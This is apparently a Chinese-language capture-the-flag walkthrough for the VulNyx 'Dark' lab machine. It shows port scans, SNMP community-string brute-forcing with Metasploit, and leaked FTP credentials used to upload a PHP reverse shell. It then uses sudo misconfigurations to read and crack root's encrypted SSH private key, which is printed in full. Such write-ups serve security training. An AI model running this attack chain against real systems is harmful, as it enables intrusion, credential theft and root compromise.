VulNyx-Dark

VulNyx-Dark

端口扫描

1
2
3
4
5
6
7
8
9
10
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.41.139                                                                                [21:56:56]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-08 21:57 CST
Nmap scan report for 192.168.41.139
Host is up (0.0020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 00:0C:29:54:27:1B (VMware)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
kali@kali [~] ➜  sudo nmap -sT -sV -sC -O -p22,80,8000 192.168.41.139                                                                            [21:57:27]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-08 21:57 CST
Nmap scan report for 192.168.41.139
Host is up (0.00041s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Dark
|_http-server-header: Apache/2.4.56 (Debian)
8000/tcp open  ftp     pyftpdlib 1.5.7
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.41.139:8000
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
MAC Address: 00:0C:29:54:27:1B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.15 seconds

8000端口是ftp服务,看样子是python启动的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
kali@kali [~] ➜  sudo nmap -sU --top-ports 20 192.168.41.139                                                                                     [22:01:13]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-08 22:01 CST
Nmap scan report for 192.168.41.139
Host is up (0.00043s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   open          snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:54:27:1B (VMware)

这里面开了一个udp的端口,是snmp

SNMP 的核心作用是:让你可以远程监控、管理和控制网络设备的运行状态,它是运维和网络管理中非常重要的一部分

像是一个监控平台的,需要注意的是,老版本的 SNMP(v1/v2c)使用明文 community 字符串(如 publicprivate)作为“密码”,安全性较差。
新版 SNMPv3 提供了更好的认证和加密功能。

这个所谓的密码就是一个字符串,可以爆破出来的

端口渗透

1
2
3
4
5
6
7
8
9
kali@kali [~] ➜  ftp 192.168.41.139 8000                                                                                                         [22:01:38]
Connected to 192.168.41.139.
220 pyftpdlib 1.5.7 ready.
Name (192.168.41.139:kali): anonymous
331 Username ok, send password.
Password: 
530 Anonymous access not allowed.
ftp: Login failed
ftp>

这种python启动的ftp服务,账号密码直接写在代码里面,不大可能有匿名登录,先放弃这里

专攻udp的snmp协议,这些是能够泄露信息的

1
msf6 > use auxiliary/scanner/snmp/snmp_login

使用msf提供的用于snmp协议的community[“登录密码”]爆破脚本

1

1
2
3
4
5
6
7
8
9
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.41.139
RHOSTS => 192.168.41.139
msf6 auxiliary(scanner/snmp/snmp_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.41.139:161 - Login Successful: root (Access level: read-only); Proof (sysDescr.0): Linux dark 5.10.0-23-amd64 #1 SMP Debian 5.10.179-3 (2023-07-27) x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/snmp/snmp_login) >

info查看需要的信息后,设置攻击地址,发现成功的字段是root

1
kali@kali [~] ➜  snmpwalk -v 2c -c root 192.168.41.139 > 1

使用snmpwalk设置版本信息为2c,-c[community]指定的就是snmp所谓的”密码”,这就是我们爆破其的原因

1
2
3
4
5
6
7
8
9
kali@kali [~] ➜  cat 1 | awk '/8000/{print $0}'                                                                                                  [22:14:21] 
iso.3.6.1.2.1.6.13.1.1.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 2                                                                                                  
iso.3.6.1.2.1.6.13.1.2.0.0.0.0.8000.0.0.0.0.0 = IpAddress: 0.0.0.0                                                                                          
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 8000                                                                                               
iso.3.6.1.2.1.6.13.1.4.0.0.0.0.8000.0.0.0.0.0 = IpAddress: 0.0.0.0                                                                                          
iso.3.6.1.2.1.6.13.1.5.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 0                                                                                                  
iso.3.6.1.2.1.6.20.1.4.1.4.0.0.0.0.8000 = Gauge32: 0                                                                                                        
iso.3.6.1.2.1.25.4.2.1.5.522 = STRING: "-c /usr/bin/python3 -m pyftpdlib -p 8000 -w -d /var/www/html/ -u frank -P my_FTP_is_c00l"                           
iso.3.6.1.2.1.25.4.2.1.5.528 = STRING: "-m pyftpdlib -p 8000 -w -d /var/www/html/ -u frank -P my_FTP_is_c00l"

拿到账号和密码:frank和my_FTP_is_c00l

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
kali@kali [~] ➜  ftp 192.168.41.139 8000                                                                                                         [22:20:32]
Connected to 192.168.41.139.
220 pyftpdlib 1.5.7 ready.
Name (192.168.41.139:kali): frank
331 Username ok, send password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||45031|).
125 Data connection already open. Transfer starting.
-rw-------   1 frank    frank         219 Aug 01  2023 index.html
226 Transfer complete.
ftp> put shell_web.php 
local: shell_web.php remote: shell_web.php
229 Entering extended passive mode (|||45501|).
125 Data connection already open. Transfer starting.
100% |***************************************************************************************************************|    81      209.26 KiB/s    00:00 ETA
226 Transfer complete.
81 bytes sent in 00:00 (55.58 KiB/s)
ftp>

直接上传反弹shell即可

1
2
3
kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [22:22:45]
listening on [any] 8888 ...
frank@dark:/var/www/html$

这里说一下,80端口,我也进行了大量的扫描,无果,转为其它端口突破

提权

1
2
3
4
5
6
7
8
9
10
11
12
frank@dark:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for frank on dark:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User frank may run the following commands on dark:
    (alan) NOPASSWD: /usr/bin/sh
frank@dark:/var/www/html$ sudo -u alan /usr/bin/sh
sudo -u alan /usr/bin/sh
id
uid=1001(alan) gid=1001(alan) groups=1001(alan)

拿到普通权限之后,尝试写入公钥,以来拿到稳定的shell

1
2
3
4
5
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCV6dTFnRnxSXTQ7EI7Bymfl/xRBCjpIzxswsIemipSdaNGMhfVeGHj9cHsnmouJ7s6KmeO5tElGpePQRO4sHILOVAQ2hEwnu1iGklDNwTKAusQqf2yxfVvvZWfWqEa3x2cV0JOGqKKVWNpof+UwIUsbR9Ka6K2WGyMa/Y7JootilSNkpxK8NOF5FjJeu8iYGAz3u7N0DP4S6YAg0XkNSQ0kkknBCLMJboryf52EohsqY0PS3mSMs9v0MBqnvcgcd7uPjzmth3P54rkJpz6/Qt5+wC//+XnQwxL9VlJsSHxx6SDn//4d/nlMG4Xa1p5yce2qHvHXV7HbXOmj5he3Av1h8S7dukdBGYGqgdFxJ2vkqv/tZzreSqKlHoR8SqsA3IUFXMnK9pr7pwThFVy9FdpQ91AuzQ0gLejm/x9EpvOoEluBdU2Sm4mue3uj2NvS0XXqlJy/KKVotymaEzeRSRMUU0zeNf9bJ0II+DjJ0+iti0XQ69T2CW4n6tFebXpXgB18qJd54zFEJoykcq7pUoclHL88+rQwhYDhjCiBhs4VOUKuLQjf3jqqGsFrC4PJ8oIfoOBnxoDXZWdh6Ly0zzC/BD2/R2OuPPuzv6XAaqF958SgI681bk5SXeTnBXAn7p8r+gIONnr+QI4evvZgh8CyWMY+v/fJO1tbIXzK/TqbQ== your_email@example.com" >authorized_keys
pwd
/home/alan/.ssh
ls    
authorized_keys
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
alan@dark:~$ sudo -l
Matching Defaults entries for alan on dark:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alan may run the following commands on dark:
    (root) NOPASSWD: /usr/bin/most
alan@dark:~$ most -h
most: invalid switch h ignored.
MOST version 5.0.0 (S-Lang version 2.3.2)
Usage:
most [-1Cbcdkstvw] [+/string] [+line number] [+s] [+d] file...
 where: -1:  assume VT100 terminal. (VMS only)
        -b:  Startup in binary mode.
        -C:  disable color support
        -c:  Make searches case sensitive.
        -d:  Do not display the \ wrap marker when wrapping lines.
        -M:  Do not attempt to mmap files.
        -s:  Squeeze out excess blank lines.
        -t:  Display tabs as ^I.  If this option is immediately followed
               by an integer, the integer sets the tab width.
        -u:  Disable UTF-8 mode
        -v:  Do not interpret backspace formatting characters.
        -w:  Wrap lines.
        -z:  No gunzip-on-the-fly.
        +/string:
             Search for string
        +line number
             Start up at specified line number.
        +d:  Allow file deletion.
        +s:  Secure Mode-- no edit, cd, shell, and reading files not
               already listed on the command line.
        +u:  Enable UTF-8 mode.

Example: most -ct4 +82 keymap.c
 makes searches case sensitive, sets tabwidth to 4, and displays the file
 keymap.c starting at line 82

most是用来读东西的,直接读取私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
alan@dark:~$ sudo /usr/bin/most /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,71FD7C202A6EE74C

lAlMOSj2Gpcdd/5cfJlRUkB0V0QFcwzLPybPDcn7qGrwn+Jn0aGozWewpGsw/vak
47GjT//JcF0z97plkZC6MUM9sGWRCaJrog0txTsZmPaJEEezVm7DE61i7hwmM9Y6
EXNGO+NDnb5bT58Yf5XZEyqCMPasUDQb+ndxZ1+F5uI3N3iThWvJdz/ZQP1mr1QH
gyLaQmG8TPS+B4UPk/YdC6K6G3Lr5OcKi0ma2Dk4fla83ygUuWbiInhXisEKJfVf
zorLDu3QJ9mdLSRI4IduQeGwz/pYDdiaTUnO94pi29FDE4iGtsofyJpChbYKk01H
UoNDItNiPPnrnFSz1w1xURbrUq8iwzbvz7Xmb0TW5zDGc83vqriM8x2ZOlaf5Qvs
qdSE1hswR/CWDOzQSO9H4B5KK/TYHjdkShwDlmewD5wuW5ELGi/k0LJrDPnXYzLA
LUYVuJZiX+8EWxjQvLTQ4JeSkIFFubc7ssVJOkkxdZUF+Wtx+fnw2a7OIh0YYnWd
HrxTysWUmP7DXTwBdX1j6HK5n4olTC1rVmmFK7Dq0dPTP2x7b3/DmBE5T4VMq6cY
1rC95tHXvGyf//3CWsO6JLh8dtdwBM/gS1VdxvKfoPntZX8XsDTWQG4tSBRGLE6O
ZYSYyrr7Pim6X8Ywso+Knh76hgceV78UBH9f5rSVh/zUDt/lKJm6mE3eTo8V+XyD
Y+TGC3Guq0LDuUPoqUPH3QAGZ76HucI1s1iTywafSwNN8ZXfo+xu9w7iHX5HoOlE
l7Pdx3n2w+4xGs8DKwbQDh4h5LbTXKtCpGHEzOWc3tpIMoXy/ngT9ZsThLwfwAmV
BMSFke9tiGFF/ZpubuSjjMBhrcfLIP6e4/OrA++UaFzAKJK1IHAlES4/jq5Ff0sy
UZIyx/8UUrlVYDPMLnnBfUe2FADuRgfYVzYk40DjjJ1g9GGPErQMjlNaQ2gWUPfH
HlDk9Lwuvd2Bgo2vvsvWb4dzB+tS/bSTH2pseQ8Mda/xQsTunaAMwDftS6eoekOL
7hf+mKBW8GDajVudbpmPtyzB7vFOFBj8iqIAyH9N+DopPsMC6vSr8PAPh9c1gi7D
XFNUO55jk1kVEsHqPbofTOB+RLirtrht9kaXksa+pNzX//qU1gQQp9389u0UAQaT
MuyHGUGluW4k/pBReOGciuWPTYocOkIEimRq88Q3n4t39IF7ltVdVSbFL9vDwicP
gTRD5FZpefCA4i+9rvUtEavH6hyoga9BEboShtzX8jR2FA8JYnnD0O3DajYiaDPM
zdFz0jyKf7vBqbV85aY8xZzZ307cWn5eCzqZXMQFybrqn4COYUpQi01RcA8JYzif
UzJSotAnQIxuuFJ2VBfxFfVUXtn6YaSQLXq3MKLVxgjcQlR64PxXy3Kzcc65tyPm
qrEcj5+aeef68deQipjFD1kChpg2AUbXM+YepZL9zxSTn2fbxkqGP1dIJZodDo1h
inZef05LR8nBM6WdQXORk4NQi/Uu50CBYkG1AI9FPUD0Ki3hKjnxADHxZg8xSj8A
JQBKpX55cD9Oz8v06iNI+FE8F7GVVKrPIE/D4461oqk+2dIV4q6mjQ==
-----END RSA PRIVATE KEY-----

有密码的,拿来破解一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
kali@kali [~] ➜  ssh2john x2 > tmp2                                                                                                              [22:31:36]
kali@kali [~] ➜  john tmp2                                                                                                                       [22:31:40]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
rootbeer         (x2)     
1g 0:00:00:00 DONE 2/3 (2025-05-08 22:31) 33.33g/s 85366p/s 85366c/s 85366C/s rockie..scorpion
Use the "--show" option to display all of the cracked passwords reliably
1
2
3
4
5
6
kali@kali [~] ➜  chmod 600 x2                                                                                                                    [22:32:32]
kali@kali [~] ➜  ssh root@192.168.41.139 -i x2                                                                                                   [22:32:37]
Enter passphrase for key 'x2': 
root@dark:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@dark:~#